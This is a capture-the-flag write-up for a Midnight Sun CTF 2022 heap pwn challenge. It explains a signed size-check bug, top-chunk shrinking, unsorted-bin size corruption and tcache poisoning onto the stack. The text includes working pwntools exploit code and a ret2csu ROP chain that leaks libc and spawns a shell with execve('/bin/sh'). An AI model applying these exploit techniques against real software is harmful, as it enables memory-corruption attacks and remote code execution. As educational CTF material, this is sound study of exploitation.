Event: Midnight Sun CTF 2022 Quals
Category: pwn
Solves: 8
Points: 588

Preliminary

To understand this article you need to have a basic knowledge about heap exploitaion. I recommend you to read my blog post about tcache and also dhavalkapil. I will use tcache poisoning and some others attacks that don’t have a name. Also it’s good to look at malloc.c sources

Vulnerability

The challenge files can be downloaded from here.
The archive consists of following files: main binary, libc, ld, libdl.so.2 and config.h. I don’t know why we got last 2 files and what it changes, also I checked out the latter file and it looked for me like a standard configurarion file so at this point I stopped paying any attention to them.

Let’s check out the code.
There is a structure:

struct Cont{
	char *ptr;
	int size;
};

There are only 3 operations.

We can write data to the buffer:

ssize_t __fastcall cmd_read(Cont *C)
{
  return read(0, C->ptr, (unsigned int)C->size);
}

We can show the address of a buffer:

void __fastcall cmd_leak(Cont *C)
{
  if ( write(1, "leak: ", 6uLL) )
    puts((const char *)C);
}

And we can allocate a new buffer - the old one is not freed, it is “forgotten”:

void __fastcall cmd_alloc(Cont *C)
{
  int size; // [rsp+14h] [rbp-Ch]
  char *chunk; // [rsp+18h] [rbp-8h]

  if ( write(1, "size: ", 6uLL) )
  {
    size = getint();
    if ( size <= 128 )
    {
      chunk = (char *)malloc(size + 1);
      if ( chunk )
      {
        C->ptr = chunk;
        C->size = size;
      }
      else
      {
        puts("\x1B[31mfail:\x1B[0m can't allocate memory...");
      }
    }
    else
    {
      puts("\x1B[31mfail:\x1B[0m c'mon bruh...");
    }
  }
}

You can see vulnerabilities here - the binary mallocs size+1 bytes but size is stored. During the comparison size <= 128 it treats it as a signed integer, so the check will pass for a value less than 0. malloc() and read() takes the size/count argument as an unsigned number. In the case we provide -1 value, malloc(0) will be called and in reality this will create a heap chunk of the size 0x20 (0x18 bytes for data and 0x8 bytes for the size field) because this is the smallest possible chunk.
The size will be stored as 0xffffffff. This is the only one allocation case that can be used for memory corruption.

Before allocate operation is called this is how the structure is initialized:

memset(C, 0, 264uLL);
C->ptr = (char *)&C->size + 1;
C->size = 0xff;

So at the beginning ptr points to the stack and it gives us stack leak which will be helpful later.

Let’s create a few helper python functions to communicate with a process:

def alloc(size):
	r.sendline("3")
	r.recvuntil("size: ")
	r.sendline(str(size-1))
	r.recvuntil("> ")

def leak():
	r.sendline("2")
	data = r.recvuntil("> ")
	data = data.split(b"\n")[0]
	data = data.split(b"leak: ")[1]
	leak = u64(data.ljust(8,b"\x00"))
	return leak
	
def save(data):
	r.sendline("1")
	time.sleep(0.2)
	r.send(data)
	r.recvuntil("> ")

And let’s leak the stack:

r.recvuntil("> ")
print("STACK PTR:")
stack = leak()
print(hex(stack))

Glibc version

To check what’s the version of glibc I usually do strings libc.so.6 | grep LIBC,

If we see something similiar to this:

...
GLIBC_2.25
GLIBC_2.26
GLIBC_2.27
GLIBC_2.28
GLIBC_2.29
GLIBC_2.30
GLIBC_PRIVATE

it means that the version is 2.30.

Creating freed chunks on the heap

We can overflow the buffer only on the newest chunk we created, yes, it’s possible to overwrite size of the top chunk to a bigger value like in house of force but this attack does not work any longer. So what about overwriting the size to the smaller value?

I’ve found house of orange attack which does this at the beginning (only this part of house of orange is helpful for our challenge).

The House of Orange starts with the assumption that a buffer overflow exists on the heap
using which the Top (also called the Wilderness) chunk can be corrupted.
      
At the beginning of execution, the entire heap is part of the Top chunk.
The first allocations are usually pieces of the Top chunk that are broken off to service the request.
Thus, with every allocation, the Top chunks keeps getting smaller.
And in a situation where the size of the Top chunk is smaller than the requested value,
there are two possibilities:
	1) Extend the Top chunk
	2) Mmap a new page
If the size requested is smaller than 0x21000, then the former is followed.

Now we request a chunk of size larger than the size of the Top chunk.
Malloc tries to service this request by extending the Top chunk
This forces sysmalloc to be invoked.

And the old Top chunk gets freed

It means that we can create freed chunks on the heap which we can overwrite later! The technique from this example is prepared for older version of glibc - 2.23. It’s 2.30 in this challenge so it will be a bit different - the freed chunk will go to tcache bin. I think that creating a freed chunk should be also possible without overwriting the size of the Top chunk but we would need to make a lot of allocations to finish the space of the Top chunk and this can take a lot of time.

I made some tests and when overwriting the size, we must left the last hex digits unmodified, for example when the size is 0x21f71 we can overwrite it to 0xf71. Otherwise we crash a program.

Preparations for tcache poisoning

The next step is to think out how to prepare for a tcache poisoning attack.

We need to create some freed chunks, let’s focus on 2 chunks now, we will call them A and B. B needs to placed at higher address than A and it must go to tcache bin. It will be overwritten by doing buffer overflow on A - we are doing tcache poisoning. We can do BO only on a chunk which we got by malloc(0) so we can’t make it to go to tcache bin because malloc(0) now would allocate this chunk and we need it for later. So let’s make it to be an unsortedbin or a smallbin. Also, we need to create chunk C that will go the the same tcache bin as B before B is freed, because this is how tcache poisoning attack work.

We want the heap to look more or less like this:

heap:
lower addresses  [C ]     [A]     [B]   higher addresses

unsortedbin or smallbin: <- A
tcache[x]: <- B <- C

We need to choose sizes for C and B and A. I decided that C and B will have the size of 0x80 bytes. For C I picked 0x40 and this is the smallest possible number for this attack to work.

Let’s create C at the beginning because it won’t be making any problems:

alloc(0)
save(b"a"*24+p64(0xd51)) #overwrite the top chunk
for i in range(22):
	alloc(129)
alloc(0x48) #no space for the next chunk
alloc(129) #the old top is freed
print("---------- 0x80 chunk in tcache")

It’s time to create a smallbin A but how to do this? I did something similiar to the code above and looped 8 times. In the code below I freed 8 chunks of size 0x40, first 7 went to tcache bin, eighth went to fastbin:

for i in range(8):
	alloc(0)
	save(b"a"*24+p64(0xf51))
	for i in range(26):
		alloc(129)
	alloc(0x48)
	alloc(129)

At this point we have following bins:

Tcachebins[idx=2, size=0x40] count=7 ...
Tcachebins[idx=6, size=0x80] count=1  ←  C    
Fastbins[idx=2, size=0x40]  count=1  ←  A 

Now we need to trigger malloc_consolidate internal heap function. It just puts fastbins into unsortedbin.

You can see in the source code of malloc.c that it’s triggered when allocating a chunk and there aren’t any good matches in any bin and the Top chunk isn’t big enough:

    use_top:
	
	  ...

      victim = av->top;
      size = chunksize (victim);

      if (__glibc_unlikely (size > av->system_mem))
        malloc_printerr ("malloc(): corrupted top size");

      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
        {
			...
        }

      else if (atomic_load_relaxed (&av->have_fastchunks))
        {
          malloc_consolidate (av);

Let’s create chunk B right now - the second chunk in tcachebin of the size of 0x80. If we follow the same procedure as above to free the Top, we will get it, and also our chunk in fastbin will go into smallbin (malloc_consolidate puts it to unsorted bin but later it’s searching for a chunk that doesn’t match any bin so our chunk from unsorted bin goes to small bin)

alloc(0)
save(b"a"*24+p64(0xf51))
for i in range(25):
	alloc(129)
alloc(0x68)
alloc(0x28)
save(p64(0x21f80)*2)#size and prev_size of a fake_chunk
alloc(129)

save(p64(0x21f80)*2) I will explain this later.

The current status of bins:

Tcachebins[idx=2, size=0x40] count=7  ...
Tcachebins[idx=6, size=0x80] count=2  ←  B  ←  C                                                                                                                                                        
[+] small_bins: A

The next line:

alloc(0)

The smallest possible size of a chunk is 0x20, so in reality we will get a chunk with 0x18 bytes for a data and 0x8 bytes for a size field. This time a chunk is not taken from the top but from a smallbin, it’s size is 0x40 so it will be split into 2 chunks of the size 0x20 bytes. That’s why this attack won’t work for a smaller chunk than 0x40 - it won’t split into 2 chunks.

Malloc returns the first half of the chunk, the second part will go into unsorted bin.

Currently it looks something like this:

heap:
lower addresses  [C ]     [A1][A2]     [B]   higher addresses

Tcachebins[idx=2, size=0x40] count=7  ...
Tcachebins[idx=6, size=0x80] count=2  ←  B  ←  C                                                                                                                                                        
[+] unsorted_bin: A2

With a buffer overflow in A1.

Corrupting chunk in an unsorted bin

But overflowing chunk B directly won’t work because read(), even when called with count=0xffffffff, doesn’t read that much bytes over the internet.

So my idea I had at the beginning needs to be modified.

Then I got an idea to overflow the size of A2 to a very big chunk so that by doing a lot of allocs in a loop we will be taking memory from this chunk all the time so that we will be able to overwrite chunk B. We need to create a fake chunk right after A2 to make this to work. Size of a fake chunk must by any proper size of a chunk with PREV_INUSE to be 0. It’s prev_size needs to be the same as the new size of the A2.

Summing up it’s something like:

int main() {
	printf("%s\n","hello");
	uint64_t* victim = malloc(0x1000);
	uint64_t* next = malloc(0x2000);
		
	printf("malloc(0x1000): %p\n", victim);	
	printf("malloc(0x2000): %p\n", next);	
	free(victim);
	victim[-1]=0x2001;//size
	victim[0x2000/8-1]=0x20; //fake chunk's size
	victim[0x2000/8-2]=0x2000; //fake chunk's prev size

	char *lol = malloc(0x1500);
	printf("malloc(0x1500): %p\n", lol);
}

$ ./unsorted
hello
malloc(0x1000): 0x55c8801556b0
malloc(0x2000): 0x55c8801566c0
malloc(0x1500): 0x55c8801556b0

0x1000 chunk is freed, its size is overwritten to 0x2000 | PREV_INUSE and the size of a fake chunk is 0x20. In the end we got 2 allocated chunks that are overlapped.

When I said that I explain save(p64(0x21f80)*2) later - its just a fake chunk right after A2.

The next part of the exploit realizes this idea:

overwrite the size of A2 to 0x21f80.
make 1000 allocations from A2
tcache poisoning - overwrite B->next to point to the return address from main.

save(b"a"*24+p64(0x21f80))
for i in range(1000):
	alloc(129)
alloc(0)
ret_addr = stack + 0x10f
save(b"d"*0x38+p64(0x81)+p64(ret_addr))
		#B->size=0x81,B->next=ret_addr
#and a standard allocation of 2 chunks
alloc(0x78)
alloc(0x78) #this points to the stack!

I was worried that we do 1000 alocations in a loop, wasn’t sure if the exploit won’t be too slow because the time is only 1 minute. But I asked a friend to buy VPS with the lowest possible pings to the server and he gave me digital ocean VPS with pings of 0.6ms!

ROP

At this point we can write ROP chain. Let’s build it.

Finally I sent 2 ROPs. The first one leaks a libc address by calling puts@plt(puts@got) and next it reads a second ROP by read() There are not many useful simple gadgets in a binary so I used ret2csu technique

rop = b""
rop += p64(0x04015e3) #pop rdi
rop += p64(0x405018) #puts@got
rop += p64(0x4010B0) #puts@plt

rop += p64(0x4015DA)
rop += p64(0x0)
rop += p64(0x0)
rop += p64(0x0)#r12
rop += p64(stack+0x15f)#r13
rop += p64(0x1000)#r14
rop += p64(0x405038)#r15 read@plt
rop += p64(0x4015C0)

save(rop)

The second stage of ROP is just a typical ROP:

#leak puts address
r.sendline("4") #exit - return from main
leak = r.recvline()
leak = leak[:-1]
libc_puts = u64(leak.ljust(8,b"\x00"))
print(libc_puts)

#send second ROP
LIBC = ELF("./lib/libc.so.6")
libc_base = libc_puts - LIBC.symbols["puts"]
print(hex(libc_base))

LIBC.address = libc_base
binsh_addr = next(LIBC.search(b"/bin/sh\x00"))
rop = ROP(LIBC)
rop.execve(binsh_addr, 0, 0)
print(rop.dump())
payload = rop.chain()
r.send(payload)
r.interactive()

And we got a flag!

Here is full epxloit source